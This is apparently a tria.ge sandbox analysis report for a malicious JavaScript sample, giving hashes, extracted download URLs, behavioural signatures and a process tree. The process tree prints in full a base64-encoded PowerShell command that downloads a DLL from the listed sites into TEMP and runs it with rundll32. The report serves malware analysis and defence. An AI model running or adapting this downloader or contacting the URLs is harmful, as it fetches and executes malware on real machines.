Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
52s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
22/03/2023, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
726b21c627f3b46ffbbfb76cc182e16461afe83ab062403f5e9d491cc58bfba5.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
726b21c627f3b46ffbbfb76cc182e16461afe83ab062403f5e9d491cc58bfba5.js
Resource
win10v2004-20230221-en
General
-
Target
726b21c627f3b46ffbbfb76cc182e16461afe83ab062403f5e9d491cc58bfba5.js
-
Size
56KB
-
MD5
47823c1f4f981be1c7982ab0a423beae
-
SHA1
80e0582d0e996c70e0971f690bfece18399d55cc
-
SHA256
726b21c627f3b46ffbbfb76cc182e16461afe83ab062403f5e9d491cc58bfba5
-
SHA512
82d354af54d2ea828793492318e3a7556f0979c9128aad51f569ca54394b63c232b91ba8731ae39fe52033a1e5085247e28181d348337b98b4077dd96e9f77ad
-
SSDEEP
1536:pL/Zdr8m3FU83O5VWxWPapLDqkDG8Gzc2h9NJQ2vQYWwrr+zY:pL/ZeS8SlnSPQ2vxW+d
Malware Config
Extracted
https://getcash2surveys.com/0HFE0G/B0pO8q
https://kingzunlimited.com/VvAmv/oCbHYAy0eo
https://odwazig.nl/xNV7x/skdz8v
https://onestopsilkscreeners.ca/o6g4bt1/mAbPqVmip
https://smeolbd.com/ntaUX/9dhOa9
https://canadianused.com/euSgOJA/l0VcI3
https://discountlandllc.com/uUbH/rzrp6AIe
https://sobanaze.com/cJn7i/GNp24jZRl6T
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1148 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1684 wrote to memory of 1148 1684 wscript.exe 29 PID 1684 wrote to memory of 1148 1684 wscript.exe 29 PID 1684 wrote to memory of 1148 1684 wscript.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\726b21c627f3b46ffbbfb76cc182e16461afe83ab062403f5e9d491cc58bfba5.js1⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcgBlAG0AaQBzAHMAaQB2AGUAUwBlAG0AaQBuAGEAdABpAG4AZwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGcAZQB0AGMAYQBzAGgAMgBzAHUAcgB2AGUAeQBzAC4AYwBvAG0ALwAwAEgARgBFADAARwAvAEIAMABwAE8AOABxACwAaAB0AHQAcABzADoALwAvAGsAaQBuAGcAegB1AG4AbABpAG0AaQB0AGUAZAAuAGMAbwBtAC8AVgB2AEEAbQB2AC8AbwBDAGIASABZAEEAeQAwAGUAbwAsAGgAdAB0AHAAcwA6AC8ALwBvAGQAdwBhAHoAaQBnAC4AbgBsAC8AeABOAFYANwB4AC8AcwBrAGQAegA4AHYALABoAHQAdABwAHMAOgAvAC8AbwBuAGUAcwB0AG8AcABzAGkAbABrAHMAYwByAGUAZQBuAGUAcgBzAC4AYwBhAC8AbwA2AGcANABiAHQAMQAvAG0AQQBiAFAAcQBWAG0AaQBwACwAaAB0AHQAcABzADoALwAvAHMAbQBlAG8AbABiAGQALgBjAG8AbQAvAG4AdABhAFUAWAAvADkAZABoAE8AYQA5ACwAaAB0AHQAcABzADoALwAvAGMAYQBuAGEAZABpAGEAbgB1AHMAZQBkAC4AYwBvAG0ALwBlAHUAUwBnAE8ASgBBAC8AbAAwAFYAYwBJADMALABoAHQAdABwAHMAOgAvAC8AZABpAHMAYwBvAHUAbgB0AGwAYQBuAGQAbABsAGMALgBjAG8AbQAvAHUAVQBiAEgALwByAHoAcgBwADYAQQBJAGUALABoAHQAdABwAHMAOgAvAC8AcwBvAGIAYQBuAGEAegBlAC4AYwBvAG0ALwBjAEoAbgA3AGkALwBHAE4AcAAyADQAagBaAFIAbAA2AFQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAZQBuAHQAaAByAGEAbABtAGUAbgB0AFMAZQBtAHAAZQByAGkAZABlAG4AdABpAGMAYQBsACAAaQBuACAAJAByAGUAbQBpAHMAcwBpAHYAZQBTAGUAbQBpAG4AYQB0AGkAbgBnACkAIAB7AHQAcgB5ACAAewBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGUAbgB0AGgAcgBhAGwAbQBlAG4AdABTAGUAbQBwAGUAcgBpAGQAZQBuAHQAaQBjAGEAbAAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADIAMAAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAVQBuAGcAcgBpAHAAcABpAG4AZwAuAGQAbABsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAVQBuAGcAcgBpAHAAcABpAG4AZwAuAGQAbABsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAFUAbgBnAHIAaQBwAHAAaQBuAGcALgBkAGwAbAAsAFcAVwA1ADAAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAfQB9AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148
-